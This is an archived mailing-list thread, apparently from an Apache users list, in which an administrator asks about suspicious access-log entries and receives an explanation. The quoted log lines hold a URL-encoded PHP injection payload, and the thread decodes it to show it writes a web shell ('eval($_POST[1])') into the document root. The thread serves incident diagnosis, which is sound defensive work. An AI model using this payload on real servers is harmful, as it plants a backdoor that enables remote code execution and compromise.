Re: am i hacked ?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

The first line is trying to create the file webconfig.txt.php in your DOCUMENT_ROOT directory, with the contents of the file being:

<?php eval($_POST[1]);?>

I didn't decode the remaining lines. I think they're just trying to do the same thing.


----- Original Message -----
From: bernd.lentes@xxxxxxxxxxxxxxxxxxxxx
To: users@xxxxxxxxxxxxxxxx
Sent: Monday, February 6, 2017 11:41:13 AM GMT -05:00 US/Canada Eastern
Subject: Re:  am i hacked ?


----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@xxxxxxxxxxxxxxxxxxxxx wrote:

> Hi,
> 
> just in the moment i found two very weird entries in may access_log:
> 
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 
> What upsets me is that these two requests have statuscode 200, which mean it was
> successfull.
> The IP is from ukraine. Where can i find out what these %charcacters mean ? Does
> anyone understand what happened here ? It's apache 2.2.3 64bit.
> 
> Thanks for any hint.
> 
> Bernd
> 

What i find out already:
https://url-encoder.de/ helped me to decode the URL:
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME
NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';

Currently i don't understand what this means.
I don't find a file webconfig.txt.php on my system.
Currently no weird process, no new user in /etc/passwd, no packtes to the network which includes this ip.

Thankful for any tip.


Bernd
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671


---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx


---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
[Index of Archives]     [Open SSH Users]     [Linux ACPI]     [Linux Kernel]     [Linux Laptop]     [Kernel Newbies]     [Security]     [Netfilter]     [Bugtraq]     [Squid]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Samba]     [Video 4 Linux]     [Device Mapper]

  Powered by Linux